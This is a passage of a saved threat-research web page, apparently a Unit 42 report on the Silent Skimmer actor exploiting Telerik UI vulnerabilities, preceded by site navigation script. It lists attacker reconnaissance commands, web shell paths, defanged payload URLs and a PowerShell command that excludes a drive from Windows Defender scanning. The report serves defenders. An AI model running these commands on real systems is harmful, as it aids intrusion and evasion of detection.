    			}
    			if (c.indexOf(name) == 0) {
    				 return c.substring(name.length, c.length);
    			}
  		}
  		return "";
	}

	var referer = "";//sessionStorage.container;
	var pcontainer = sessionStorage.getItem("container");
	var searchResultsPagePath = "";
	if(((pcontainer) && pcontainer.indexOf('Prisma')!=-1)){
	    referer = 'Prisma' ;
	}
        else if(((pcontainer) && pcontainer.indexOf('Cortex')!=-1)){
	    referer = 'Cortex' ;
	}
        else if(((pcontainer) && pcontainer.indexOf('Sase')!=-1)){
	    referer = 'Sase' ;
	}
	else if(((pcontainer) && pcontainer.indexOf('Unit')!=-1)){
	    referer = 'Unit' ;
	}
	else if(((pcontainer) && pcontainer.indexOf('Ngfw')!=-1)){
	    referer = 'Ngfw' ;
	}
        var fromRef = document.referrer;
        var nContainer = getCookie("navContainer");
        if(nContainer){//If user is coming from main site, we need to reset the container		
		if(fromRef  && fromRef.indexOf("prismacloud.io")!=-1){
                        referer = 'Prisma' ;
                        sessionStorage.setItem("container","Prisma");
                } else if(fromRef.indexOf("paloaltonetworks.com")!=-1 || fromRef.indexOf("paloaltonetworks.jp")!=-1 ){
                        if(nContainer.indexOf('Prisma') != -1){
                            referer = 'Prisma' ;
                            sessionStorage.setItem("container","Prisma");
                        }
                        if(nContainer.indexOf('Cortex') != -1){
                            referer = 'Cortex' ;
                            sessionStorage.setItem("container","Cortex");
                        }
			if(nContainer.indexOf('Sase') != -1){
                            referer = 'Sase' ;
                            sessionStorage.setItem("container","Sase");
                        }
			if(nContainer.indexOf('Unit') != -1){
                            referer = 'Unit' ;
                            sessionStorage.setItem("container","Unit");
                        }
			if(nContainer.indexOf('Ngfw') != -1){
                            referer = 'Ngfw' ;
                            sessionStorage.setItem("container","Ngfw");
                        }
			document.cookie = 'navContainer=; path=/; domain=.paloaltonetworks.com; expires=' + new Date(0).toUTCString();
		}
	}
if(referer != "Prisma" && referer != "Cortex" && referer != "Sase" && referer != "Unit" && referer != "Ngfw") {
    referer = 'Unit' ;
    sessionStorage.setItem("container","Unit");
}
function callMainSitePrismaNavHTML(){
    
    var referrer_domain = 'https://www.paloaltonetworks.com';
    sessionStorage.setItem("domain",referrer_domain);
    if(referer == 'Prisma'){
        var menu_url = referrer_domain+'/_jcr_content/globals/cleanHeaderPrisma.prismaRenderer.html';
        searchResultsPagePath = referrer_domain+"/search/prismasearch";
        }
    if(referer == 'Cortex'){
        var menu_url = referrer_domain+'/_jcr_content/globals/cleanHeaderCortex.cortexRenderer.html';	
        searchResultsPagePath = referrer_domain+"/search/cortexsearch";	
    }
    if(referer == 'Sase'){
        var menu_url = referrer_domain+'/_jcr_content/globals/cleanHeaderSase.saseRenderer.html';
        searchResultsPagePath = referrer_domain+"/search/sasesearch";
    }
    if(referer == 'Unit'){
        var menu_url = 'https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/unit-nav-renderer.php';
        searchResultsPagePath = referrer_domain+"/content/pan/en_US/search/unit42search";
		    }
    if(referer == 'Ngfw'){
        var menu_url = 'https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/ngfw-cdss-nav-renderer.php';
        searchResultsPagePath = referrer_domain+"/search/ngfwcdsssearch";
    }
    httpGet(menu_url,'menu_html');
    document.getElementById('main-nav-menu-cont').removeAttribute("style");
}
function addStyle(styles) {            
    /* Create style document */
    var css = document.createElement('style');
    css.type = 'text/css';

    if (css.styleSheet) 
        css.styleSheet.cssText = styles;
    else 
        css.appendChild(document.createTextNode(styles));

    /* Append style to the tag name */
    document.getElementsByTagName("head")[0].appendChild(css);
}
function httpGet(theUrl,req_type) {
    if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp=new XMLHttpRequest();
    } else {// code for IE6, IE5
        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    xmlhttp.onreadystatechange=function()
    {
        if (xmlhttp.readyState==4 && xmlhttp.status==200)
        {
            if(req_type == 'menu_html'){
            var nav_text = xmlhttp.responseText.replaceAll('https://static.cloud.coveo.com/searchui/v2.9159/js/CoveoJsSearch.Lazy.min.js', '');
            nav_text = nav_text.replaceAll('src="/', 'src="'+maindomain_lang+'/');
            nav_text = nav_text.replaceAll("'/content", "'"+maindomain_lang+"/content");
                        
            document.getElementById("PAN_2021_NAV_ASYNC").innerHTML = nav_text.replaceAll('href="/', 'href="'+maindomain_lang+'/');

            var lozad_back = document.getElementsByClassName('lozad-background');
            Array.prototype.forEach.call(lozad_back, function(el) {
            // Do stuff here
            var el_back_img_path = el.getAttribute('data-background-image');
            var first_pos = el_back_img_path.indexOf("'");
            var last_pos = el_back_img_path.indexOf("'",first_pos+1);
            el_back_img_path = el_back_img_path.substring(first_pos+1,last_pos);
            el.setAttribute("data-background-image",main_site_url+el_back_img_path);
            });
            }
            if(req_type == 'head_inline_css'){
            addStyle(xmlhttp.responseText);
            }
        }
    }
    xmlhttp.open("GET", theUrl, true );
    xmlhttp.send();    
}    
    
if(referer == 'Prisma' || referer == 'Cortex' || referer == 'Sase' || referer == 'Unit' || referer == 'Ngfw'){
    const article = document.querySelector('#PAN_2021_NAV_ASYNC');
    if(referer == 'Prisma'){
        article.dataset.type = 'prisma';
        $('#PAN_2021_NAV_ASYNC').removeClass('default').addClass('defaultRedesigned');
    }
    else if(referer == 'Cortex'){
        article.dataset.type = 'cortex';
    }
    else if(referer == 'Sase'){
        article.dataset.type = 'sase';
    }
    else if(referer == 'Unit'){
        article.dataset.type = 'unit';
    }
    else if(referer == 'Ngfw'){
        article.dataset.type = 'ngfw';
    }
    //set class to default
    if(referer == 'Unit' || referer == 'Ngfw'){
        $('#PAN_2021_NAV_ASYNC').removeClass('default').addClass('defaultRedesigned');
    }
    callMainSitePrismaNavHTML();        
}
</script>
<!--  End: Scripts Migrated From Unit42-v5 -->



<main class="main">
    <section class="section section--article">
        <div class="pa article-banner" style="background-image:url('https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/11_Cybercrime_Category_1920x900.jpg')">
          <div class="l-container"> 
            <div class="l-breadcrumbs"> 
              <ul> <li> <a href="https://unit42.paloaltonetworks.com" role="link" title="Threat Research" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:breadcrumb:Threat Research">Threat Research Center</a></li><li><a href="https://unit42.paloaltonetworks.com/category/threat-actor-groups/" role="link" title="Threat Actor Groups" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:breadcrumb:Threat Actor Groups">Threat Actor Groups</a></li><li class="is-current"><a href="https://unit42.paloaltonetworks.com/category/cybercrime/" role="link" title="Cybercrime" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:breadcrumb:Cybercrime">Cybercrime</a></li> </ul>
            </div>            <div class="ab__title">
              <a class="card-category" href="https://unit42.paloaltonetworks.com/category/cybercrime/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cybercrime"><span class="ab-title__pre">Cybercrime</span></a> 
              <h1>Silent Skimmer Gets Loud (Again)</h1>
              <div class="ab__video">
              <span class="duration"> 
                <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg" alt="Clock Icon"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 11</span> <span class="rt-label rt-postfix"></span></span> min read              </span>
                              </div>          
              <div class="ab-lc__wrapper">
                <span class="ab-title__pre">Related Products</span><div class="ab__link-cards"><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/advanced-dns-security/" style="--card-color: #ffcb06" role="link" title="Advanced DNS Security" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Advanced DNS Security"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png" alt="Advanced DNS Security icon">Advanced DNS Security</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/advanced-threat-prevention/" style="--card-color: #ffcb06" role="link" title="Advanced Threat Prevention" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Advanced Threat Prevention"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png" alt="Advanced Threat Prevention icon">Advanced Threat Prevention</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/" style="--card-color: #ffcb06" role="link" title="Advanced URL Filtering" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Advanced URL Filtering"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png" alt="Advanced URL Filtering icon">Advanced URL Filtering</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/" style="--card-color: #ffcb06" role="link" title="Advanced WildFire" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Advanced WildFire"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png" alt="Advanced WildFire icon">Advanced WildFire</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/cloud-delivered-security-services/" style="--card-color: #ffcb06" role="link" title="Cloud-Delivered Security Services" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cloud-Delivered Security Services"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png" alt="Cloud-Delivered Security Services icon">Cloud-Delivered Security Services</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/cortex/" style="--card-color: #00cc66" role="link" title="Cortex" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cortex"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png" alt="Cortex icon">Cortex</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/cortex-xdr/" style="--card-color: #00cc66" role="link" title="Cortex XDR" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cortex XDR"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png" alt="Cortex XDR icon">Cortex XDR</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/cortex-xpanse/" style="--card-color: #00cc66" role="link" title="Cortex Xpanse" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cortex Xpanse"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png" alt="Cortex Xpanse icon">Cortex Xpanse</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/cortex-xsiam/" style="--card-color: #00cc66" role="link" title="Cortex XSIAM" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cortex XSIAM"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png" alt="Cortex XSIAM icon">Cortex XSIAM</a><a class="l-linkcard is-blue" href="https://unit42.paloaltonetworks.com/product-category/unit-42-incident-response/" style="--card-color: #c94727" role="link" title="Unit 42 Incident Response" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Unit 42 Incident Response"><img src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png" alt="Unit 42 Incident Response icon">Unit 42 Incident Response</a></div>              </div>
            </div>
          </div>
          <div class="ab__footer">
            <div class="l-container">
              <div class="ab__footer-wrapper">
                <ul class="ab__features" role="list">
                  <li role="listitem">
				 <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg" alt="Profile Icon">
					 <div class="ab__text"><span>By:</span><ul class="ab__tags"><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Veronika Senderovych" href="https://unit42.paloaltonetworks.com/author/veronika-senderovych/">Veronika Senderovych</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Chema Garcia" href="https://unit42.paloaltonetworks.com/author/chema-garcia/">Chema Garcia</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Zack Fink" href="https://unit42.paloaltonetworks.com/author/zack-fink/">Zack Fink</a></li></ul></div></li>                  <li role="listitem">
			<img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg" alt="Published Icon">
			<div class="ab__text"><span>Published:</span>November 7, 2024</div></li>					<li role="listitem"><img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg" alt="Tags Icon"><div class="ab__text"><span>Categories:</span><ul class="ab__tags"><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Cybercrime" href="https://unit42.paloaltonetworks.com/category/cybercrime/">Cybercrime</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Threat Actor Groups" href="https://unit42.paloaltonetworks.com/category/threat-actor-groups/">Threat Actor Groups</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Threat Research" href="https://unit42.paloaltonetworks.com/category/threat-research/">Threat Research</a></li></ul></div>
		</li>                  <li role="listitem"><img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg" alt="Tags Icon"><div class="ab__text"><span>Tags:</span><ul class="ab__tags"><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:C++" href="https://unit42.paloaltonetworks.com/tag/c/">C++</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:CL-CRI-0941" href="https://unit42.paloaltonetworks.com/tag/cl-cri-0941/">CL-CRI-0941</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:CVE-2017-11317" href="https://unit42.paloaltonetworks.com/tag/cve-2017-11317/">CVE-2017-11317</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:CVE-2019-18935" href="https://unit42.paloaltonetworks.com/tag/cve-2019-18935/">CVE-2019-18935</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:GodPotato" href="https://unit42.paloaltonetworks.com/tag/godpotato/">GodPotato</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Python" href="https://unit42.paloaltonetworks.com/tag/python/">Python</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Remote Code Execution" href="https://unit42.paloaltonetworks.com/tag/remote-code-execution/">Remote Code Execution</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:reverse shells" href="https://unit42.paloaltonetworks.com/tag/reverse-shells/">Reverse shells</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:RingQ loader" href="https://unit42.paloaltonetworks.com/tag/ringq-loader/">RingQ loader</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Silent Skimmer" href="https://unit42.paloaltonetworks.com/tag/silent-skimmer/">Silent Skimmer</a></li><li><a data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:Telerik UI" href="https://unit42.paloaltonetworks.com/tag/telerik-ui/">Telerik UI</a></li></ul></div>
		</li>                </ul>
                <div class="ab__options">
                  <ul role="list">
                                        <li role="listitem"><a href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/?pdf=download&amp;lg=en&amp;_wpnonce=4c4940f0d1" role="link" title="Click here to download" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:pdfdownload" target="_blank"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg" alt="Download Icon"></a></li>
                    <li role="listitem"><a href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/?pdf=print&amp;lg=en&amp;_wpnonce=4c4940f0d1" role="link" title="Click here to print" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:hero:pdfprint" target="_blank"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg" alt="Print Icon"></a></li>
                  </ul>
                  
	<div class="ab__share" id="shareDropdown" role="button" aria-expanded="false">
	<a href="#" role="link" title="Click here to share" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share" class="">Share<img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg" alt="Down arrow"></a><ul class="share-dropdown" role="menu">
				<li role="menuitem">
					<a href="#" class="copy-url" id="copyUrl" data-url="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/" role="link" title="Copy link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:link" target="_blank"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg" alt="Link Icon"></a>
				</li>
				<li role="menuitem">
					<a href="mailto:?subject=Silent%20Skimmer%20Gets%20Loud%20(Again)&amp;body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F" role="link" title="Share in email" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:email" target="_blank"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg" alt="Link Email"></a>
				</li>
				<li role="menuitem">
					<a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F" target="_blank" role="link" title="Share in Facebook" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:facebook"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg" alt="Facebook Icon"></a>
				</li>
				<li role="menuitem">
					<a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F&amp;title=Silent%20Skimmer%20Gets%20Loud%20(Again)" target="_blank" role="link" title="Share in LinkedIn" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:linkedin"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg" alt="LinkedIn Icon"></a>
				</li>
				<li role="menuitem">
					<a href="https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F&amp;text=Silent%20Skimmer%20Gets%20Loud%20(Again)" target="_blank" role="link" title="Share in Twitter" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:twitter"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg" alt="Twitter Icon"></a>
				</li>
				<li role="menuitem">
					<a href="//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F" target="_blank" role="link" title="Share in Reddit" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:reddit"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg" alt="Reddit Icon"></a>
				</li>
				<li role="menuitem">
					<a href="https://mastodon.social/share?text=Silent%20Skimmer%20Gets%20Loud%20(Again)%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F" target="_blank" role="link" title="Share in Mastodon" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:share:mastodon"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg" alt="Mastodon Icon"></a>
				</li>
	  </ul>
    </div>                </div>
              </div>
            </div>
          </div>
        </div>
      </section> 
    <section class="section blog-contents"> 
      <div class="pa blog-editor">
        <div class="l-container">
          <div class="be__wrapper">
            <div class="be__contents">
              <div class="be__contents-wrapper">
                










































































<!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		
<!-- [Format Time: 0.0003 seconds] -->
<!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		
<!-- [Format Time: 0.0002 seconds] -->
<!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		
<!-- [Format Time: 0.0002 seconds] -->






      
              <div class="section-wrapper" id="section-1"><h2 id="section-1-title" data-section="scrollable"><a id="post-137319-_4lt92rr5muov"></a><strong>Executive Summary</strong></h2><p>In late May 2024, Unit 42 researchers observed an adversary compromising multiple web servers to gain access to the environment of a multinational organization headquartered in North America. Based on overlaps in adversary infrastructure and tools, as well as tactics, techniques and procedures (TTPs), it’s possible to attribute the activity identified to the same threat actor behind the Silent Skimmer campaign.</p><p>In September 2023, an online payment scraping campaign was uncovered and dubbed Silent Skimmer. Since then, there has been little to no news of Silent Skimmer – until now.</p><p>According to our research, the financially motivated threat actor behind the Silent Skimmer campaign is targeting organizations that host or create payment infrastructure and gateways. Unit 42 tracks the activity identified in this article as <a href="https://unit42.paloaltonetworks.com/from-activity-to-formal-naming/">CL-CRI-0941</a>.</p><p>Palo Alto Networks customers are better protected from these threats through <a href="https://www.paloaltonetworks.com/cortex/cortex-xdr" rel="noopener">Cortex XDR</a> and <a href="https://www.paloaltonetworks.com/cortex/cortex-xsiam" rel="noopener">XSIAM</a>, as well as <a href="https://www.paloaltonetworks.com/network-security/security-subscriptions" rel="noopener">Cloud-Delivered Security Services</a> including <a href="https://docs.paloaltonetworks.com/advanced-url-filtering/administration" target="_blank" rel="noopener">Advanced URL Filtering</a>, <a href="https://docs.paloaltonetworks.com/dns-security" target="_blank" rel="noopener">Advanced DNS Security</a>, <a href="https://www.paloaltonetworks.com/network-security/advanced-threat-prevention" rel="noopener">Advanced Threat Prevention</a> and <a href="https://docs.paloaltonetworks.com/wildfire" target="_blank" rel="noopener">Advanced WildFire</a>. <a href="https://www.paloaltonetworks.com/cortex/cortex-xpanse" rel="noopener">Cortex Xpanse</a> is able to identify internet-facing instances of Telerik UI. Organizations can engage the <a href="https://start.paloaltonetworks.com/contact-unit42.html" target="_blank" rel="noopener">Unit 42 Incident Response team</a> for specific assistance with this threat and others.</p><div class="table__wrapper"><table style="width: 100%;">
<thead>
<tr>
<td style="width: 35%;"><b>Related Unit 42 Topics</b></td>
<td style="width: 100%;"><a href="https://unit42.paloaltonetworks.com/tag/remote-code-execution/" rel="noopener"><b>Remote Code Execution (RCE)</b></a></td>
</tr>
</thead>
</table></div></div><div class="section-wrapper" id="section-2"><h2 id="section-2-title" data-section="scrollable"><a id="post-137319-_tsj7255kmuk2"></a><strong>Observed Activities and TTPs</strong></h2><p>In May 2024, Unit 42 researchers investigated an incident where attackers compromised multiple web servers to gain access to their environment and dump payment information. The threat actor gained an initial foothold on the servers by exploiting a couple of one-day Telerik user interface (UI) vulnerabilities.</p><p>Telerik UI is a popular framework for developing the user interface of <a href="https://dotnet.microsoft.com/en-us/apps/aspnet" target="_blank" rel="noopener">ASP.NET web applications</a>. The threat actor attempted to exploit two Telerik UI vulnerabilities to gain initial access to the environment:</p><ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-11317" target="_blank" rel="noopener">CVE-2017-11317</a> — Unrestricted file upload via weak encryption</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-18935" target="_blank" rel="noopener">CVE-2019-18935</a> — Remote code execution via insecure deserialization</li>
</ul><p>Adversaries commonly exploit both of these vulnerabilities. They are a part of CISA’s Known Exploited Vulnerabilities Catalog.</p><p>The vulnerabilities allow for remote code execution on servers running older, vulnerable versions of Telerik UI. We recommend upgrading to the <a href="https://www.telerik.com/support/whats-new/aspnet-ajax/release-history" target="_blank" rel="noopener">latest available version</a>.</p><p>Following the vulnerabilities' exploitation, the attacker executed multiple reconnaissance commands and gained persistence. The following commands were among those executed:</p><ul>
<li><span style="font-family: 'courier new', courier, monospace;">set</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">whoami</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">quser</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">net user</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">dir</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">tasklist /svc</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">ipconfig</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">netstat -ano | findstr \"443\"</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">net localgroup administrators</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">dir c:\users\public</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">"C:\Windows\system32\ARP.EXE" -a</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">"C:\Windows\system32\systeminfo.exe"</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">"C:\Windows\system32\reg.exe" query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">cmd /c hostname</span></li>
</ul><p>The threat actor leveraged several techniques to achieve a foothold and execution onto the servers and environment.</p><p>The attacker uploaded multiple web shells, mainly to the following directories:</p><ul>
<li><span style="font-family: 'courier new', courier, monospace;">C:\Users\Public\Music\</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">C:\WebRoot\Health Checks\Default\</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">C:\WebRoot\Web Applications\*\*\Images\Common\</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">C:\WebRoot\IIS\Web Applications\*\*\Images\Common\</span></li>
<li><span style="font-family: 'courier new', courier, monospace;">C:\WebRoot\IIS\Web Applications\Production\*\*\Images\Common\</span></li>
</ul><p>The attacker also dropped and executed multiple reverse shells, as we describe later in the <a href="#post-137319-_a63ybt6s65b8">Reverse Shells</a> section. These reverse shells were responsible for the rest of the executions we describe in this article.</p><p>We also observed that the threat actor used tunneling and reverse proxy tools such as <a href="https://github.com/editso/fuso" target="_blank" rel="noopener">Fuso</a> and <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP</a>. These allowed the attacker to expose the exploited servers located behind a network address translation (NAT) or firewall to the internet.</p><p>We observed the following reverse proxy executions:</p><p><img class="alignnone wp-image-137324 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-256475-137319-1.png" alt="Screenshot of bulleted list of the reverse proxy executions." width="600" height="116" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-256475-137319-1.png 1494w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-256475-137319-1-786x152.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-256475-137319-1-768x148.png 768w" sizes="(max-width: 600px) 100vw, 600px"><div class="enlarge" style="bottom: 0px;"></div></p><p>We observed the attacker using <a href="https://github.com/BeichenDream/GodPotato" target="_blank" rel="noopener">GodPotato</a> for privilege escalation. GodPotato executed using a Base64-encoded PowerShell command that translated to the command shown in Figure 1 below.</p><figure id="attachment_137326" aria-describedby="caption-attachment-137326" style="width: 900px" class="wp-caption alignnone"><img class="wp-image-137326 lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-259005-137319-2.png" alt="Screenshot of a command line interface displaying a PowerShell code snippet." width="900" height="57" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-259005-137319-2.png 1895w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-259005-137319-2-786x50.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-259005-137319-2-768x49.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/word-image-259005-137319-2-1536x97.png 1536w" sizes="(max-width: 900px) 100vw, 900px"><figcaption id="caption-attachment-137326" class="wp-caption-text">Figure 1. GodPotato download and execution.</figcaption><div class="enlarge" style="bottom: 34.69px;"></div></figure><p>The attacker retrieved other GodPotato payloads from <span style="font-family: 'courier new', courier, monospace;">http://48[.]218.138.60/a.txt</span> and <span style="font-family: 'courier new', courier, monospace;">http://48[.]218.138[.]60/m.txt</span>. They used these to execute <span style="font-family: 'courier new', courier, monospace;">powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath D:\</span> to add <span style="font-family: 'courier new', courier, monospace;">D:\</span> to the Windows Defender exclusion list to evade detection.</p><h3 data-section="scrollable" id="section2SubHeading1"><a id="post-137319-_ef1rrxlilmm1"></a>Native C++ Code Embedded within .NET Binaries</h3><p>To bypass the security measures and make the analysis process more difficult, the threat actor used .NET binaries with native C++ code embedded by leveraging <a href="https://learn.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=msvc-170" target="_blank" rel="noopener">mixed mode assemblies</a>. The threat actor used this as a way to include code from one programming language embedded in another, which is an old technique some programming languages natively support.</p><p>In this case, mixed-mode assemblies were used to embed native C++ code within a .NET binary. As a result, some .NET binary analysis tools are unable to analyze the embedded (<a href="https://learn.microsoft.com/en-us/dotnet/standard/managed-code" target="_blank" rel="noopener">unmanaged</a>) code. This requires researchers to put in extra effort to identify the malicious payload. In 2022, <a href="https://www.mandiant.com/sites/default/files/2022-11/06-alamode.pdf" target="_blank" rel="noopener">Mandiant [PDF]</a> used a sample employing this technique in their annual FLARE-On Challenge.</p><p>The threat actor used this feature to create .NET wrapper binaries to execute malicious code. So when analyzing the binaries with .NET analysis tools like dnSpy for instance, there is no code to be executed as shown in Figure 2.</p><figure id="attachment_137328" aria-describedby="caption-attachment-137328" style="width: 400px" class="wp-caption alignnone"><img class="wp-image-137328 lozad" 